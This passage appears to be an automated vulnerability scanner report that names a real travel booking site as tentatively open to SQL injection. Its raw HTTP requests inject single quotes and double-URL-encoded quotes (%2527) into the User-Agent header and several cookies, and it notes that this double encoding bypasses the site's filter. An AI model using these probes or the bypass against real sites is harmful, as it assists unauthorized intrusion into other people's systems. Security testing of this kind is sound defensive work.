User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1'
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=16&c2=107
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 1

HTTP/1.1 503 Service Unavailable
Date: Fri, 30 Sep 2011 13:14:06 GMT
Server: KomHttpServer/7.1.3 (unix)
Content-type: text/html;charset=utf-8
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 107
X-Cnection: close

<html><head><meta http-equiv="refresh" content="1"></head><body>Stand by one second please...</body></html>

Request 2

GET /v6?siteid=64& HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1''
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.mcafeesecure.com/us/forconsumers/mcafee_certified_sites.jsp?c1=16&c2=107
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:14:07 GMT
Server: KomHttpServer/7.1.3 (unix)
Expires: Wed, 11 Jun 1980 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Author: Ramon Leon found at http://onsmalltalk.com
Content-type: text/html;charset=utf-8
Set-Cookie: checkin=; expires=Sat, 3-January-2009 13:14:7 GMT; path=/v6
Set-Cookie: siteId=64; expires=Sat, 29-September-2012 13:14:7 GMT; path=/v6
Set-Cookie: currency=USD; expires=Sat, 29-September-2012 13:14:7 GMT; path=/v6
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 47174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>ReserveTrav
...[SNIP]...

1.11. http://www.reservetravel.com/v6 [User-Agent HTTP header]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reservetravel.com
Path:   /v6

Issue detail

The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the User-Agent HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1%2527
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 1

HTTP/1.1 503 Service Unavailable
Date: Fri, 30 Sep 2011 13:18:22 GMT
Server: KomHttpServer/7.1.3 (unix)
Content-type: text/html;charset=utf-8
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 107
X-Cnection: close

<html><head><meta http-equiv="refresh" content="1"></head><body>Stand by one second please...</body></html>

Request 2

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1%2527%2527
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:18:23 GMT
Server: KomHttpServer/7.1.3 (unix)
Expires: Wed, 11 Jun 1980 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Author: Ramon Leon found at http://onsmalltalk.com
Content-type: text/html;charset=utf-8
Set-Cookie: checkin=; expires=Sat, 3-January-2009 13:18:23 GMT; path=/v6
Set-Cookie: siteId=64; expires=Sat, 29-September-2012 13:18:23 GMT; path=/v6
Set-Cookie: currency=USD; expires=Sat, 29-September-2012 13:18:23 GMT; path=/v6
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 120654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Chicago, IL
...[SNIP]...

1.12. http://www.reservetravel.com/v6 [__utma cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reservetravel.com
Path:   /v6

Issue detail

The __utma cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utma cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1'; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 1

HTTP/1.1 503 Service Unavailable
Date: Fri, 30 Sep 2011 13:17:54 GMT
Server: KomHttpServer/7.1.3 (unix)
Content-type: text/html;charset=utf-8
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 107
X-Cnection: close

<html><head><meta http-equiv="refresh" content="1"></head><body>Stand by one second please...</body></html>

Request 2

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1''; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:17:55 GMT
Server: KomHttpServer/7.1.3 (unix)
Expires: Wed, 11 Jun 1980 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Author: Ramon Leon found at http://onsmalltalk.com
Content-type: text/html;charset=utf-8
Set-Cookie: checkin=; expires=Sat, 3-January-2009 13:17:55 GMT; path=/v6
Set-Cookie: siteId=64; expires=Sat, 29-September-2012 13:17:55 GMT; path=/v6
Set-Cookie: currency=USD; expires=Sat, 29-September-2012 13:17:55 GMT; path=/v6
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 120654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Chicago, IL
...[SNIP]...

1.13. http://www.reservetravel.com/v6 [__utmb cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reservetravel.com
Path:   /v6

Issue detail

The __utmb cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmb cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmb cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377%2527; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 1

HTTP/1.1 503 Service Unavailable
Date: Fri, 30 Sep 2011 13:17:57 GMT
Server: KomHttpServer/7.1.3 (unix)
Content-type: text/html;charset=utf-8
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 107
X-Cnection: close

<html><head><meta http-equiv="refresh" content="1"></head><body>Stand by one second please...</body></html>

Request 2

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377%2527%2527; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:17:58 GMT
Server: KomHttpServer/7.1.3 (unix)
Expires: Wed, 11 Jun 1980 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Author: Ramon Leon found at http://onsmalltalk.com
Content-type: text/html;charset=utf-8
Set-Cookie: checkin=; expires=Sat, 3-January-2009 13:17:58 GMT; path=/v6
Set-Cookie: siteId=64; expires=Sat, 29-September-2012 13:17:58 GMT; path=/v6
Set-Cookie: currency=USD; expires=Sat, 29-September-2012 13:17:58 GMT; path=/v6
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 120654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Chicago, IL
...[SNIP]...

1.14. http://www.reservetravel.com/v6 [__utmc cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reservetravel.com
Path:   /v6

Issue detail

The __utmc cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmc cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmc cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140%2527; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 1

HTTP/1.1 503 Service Unavailable
Date: Fri, 30 Sep 2011 13:18:00 GMT
Server: KomHttpServer/7.1.3 (unix)
Content-type: text/html;charset=utf-8
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 107
X-Cnection: close

<html><head><meta http-equiv="refresh" content="1"></head><body>Stand by one second please...</body></html>

Request 2

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140%2527%2527; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:18:01 GMT
Server: KomHttpServer/7.1.3 (unix)
Expires: Wed, 11 Jun 1980 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Author: Ramon Leon found at http://onsmalltalk.com
Content-type: text/html;charset=utf-8
Set-Cookie: checkin=; expires=Sat, 3-January-2009 13:18:1 GMT; path=/v6
Set-Cookie: siteId=64; expires=Sat, 29-September-2012 13:18:1 GMT; path=/v6
Set-Cookie: currency=USD; expires=Sat, 29-September-2012 13:18:1 GMT; path=/v6
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 120654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Chicago, IL
...[SNIP]...

1.15. http://www.reservetravel.com/v6 [__utmv cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reservetravel.com
Path:   /v6

Issue detail

The __utmv cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmv cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmv cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1%2527; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 1

HTTP/1.1 503 Service Unavailable
Date: Fri, 30 Sep 2011 13:18:06 GMT
Server: KomHttpServer/7.1.3 (unix)
Content-type: text/html;charset=utf-8
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 107
X-Cnection: close

<html><head><meta http-equiv="refresh" content="1"></head><body>Stand by one second please...</body></html>

Request 2

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1%2527%2527; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:18:07 GMT
Server: KomHttpServer/7.1.3 (unix)
Expires: Wed, 11 Jun 1980 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Author: Ramon Leon found at http://onsmalltalk.com
Content-type: text/html;charset=utf-8
Set-Cookie: checkin=; expires=Sat, 3-January-2009 13:18:7 GMT; path=/v6
Set-Cookie: siteId=64; expires=Sat, 29-September-2012 13:18:7 GMT; path=/v6
Set-Cookie: currency=USD; expires=Sat, 29-September-2012 13:18:7 GMT; path=/v6
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 120654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Chicago, IL
...[SNIP]...

1.16. http://www.reservetravel.com/v6 [__utmz cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reservetravel.com
Path:   /v6

Issue detail

The __utmz cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __utmz cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the __utmz cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp%2527; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 1

HTTP/1.1 503 Service Unavailable
Date: Fri, 30 Sep 2011 13:18:03 GMT
Server: KomHttpServer/7.1.3 (unix)
Content-type: text/html;charset=utf-8
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 107
X-Cnection: close

<html><head><meta http-equiv="refresh" content="1"></head><body>Stand by one second please...</body></html>

Request 2

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp%2527%2527; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 2

HTTP/1.1 200 OK
Date: Fri, 30 Sep 2011 13:18:04 GMT
Server: KomHttpServer/7.1.3 (unix)
Expires: Wed, 11 Jun 1980 12:00:00 GMT
Cache-Control: no-cache, must-revalidate
Pragma: no-cache
Author: Ramon Leon found at http://onsmalltalk.com
Content-type: text/html;charset=utf-8
Set-Cookie: checkin=; expires=Sat, 3-January-2009 13:18:4 GMT; path=/v6
Set-Cookie: siteId=64; expires=Sat, 29-September-2012 13:18:4 GMT; path=/v6
Set-Cookie: currency=USD; expires=Sat, 29-September-2012 13:18:4 GMT; path=/v6
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 120654

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"><html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en"><head><title>Chicago, IL
...[SNIP]...

1.17. http://www.reservetravel.com/v6 [currency cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reservetravel.com
Path:   /v6

Issue detail

The currency cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the currency cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of the currency cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.186 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://www.reservetravel.com/v6?siteid=64&
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: server=v63015; siteId=64; currency=USD%2527; __utma=207989140.865346587.1317388377.1317388377.1317388377.1; __utmb=207989140.1.10.1317388377; __utmc=207989140; __utmz=207989140.1317388377.1.1.utmcsr=mcafeesecure.com|utmccn=(referral)|utmcmd=referral|utmcct=/us/forconsumers/mcafee_certified_sites.jsp; __utmv=207989140.|1=siteId=64=1; visited=true; BIGipServerlinux=537569472.20480.0000; BIGipServerimages=218802368.20480.0000

Response 1

HTTP/1.1 503 Service Unavailable
Date: Fri, 30 Sep 2011 13:17:51 GMT
Server: KomHttpServer/7.1.3 (unix)
Content-type: text/html;charset=utf-8
Via: 1.1 www.reservetravel.com
Vary: Accept-Encoding
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTR STP IND DEM"
Content-Length: 107
X-Cnection: close

<html><head><meta http-equiv="refresh" content="1"></head><body>Stand by one second please...</body></html>

Request 2

GET /v6?type=hotellist&city=Chicago%2C%20IL&siteid=64 HTTP/1.1
Host: www.reservetravel.com
Proxy-Connection: keep-alive
